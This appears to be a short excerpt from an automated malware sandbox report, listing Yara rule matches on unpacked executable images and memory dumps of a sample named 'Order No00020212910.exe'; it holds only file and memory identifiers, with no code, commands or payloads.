Source: Yara match File source: 5.0.Order No00020212910.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Order No00020212910.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Order No00020212910.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Order No00020212910.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Order No00020212910.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Order No00020212910.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Order No00020212910.exe.3cffe30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.360093784.00000000012A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.358557026.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.359113486.0000000000F30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.286837768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.538894457.0000000002DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.331858706.000000000FC45000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.538763652.0000000002D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.290527525.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.537812655.0000000000B10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.317344096.000000000FC45000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.287427426.0000000000400000.00000040.00000001.sdmp, type: MEMORY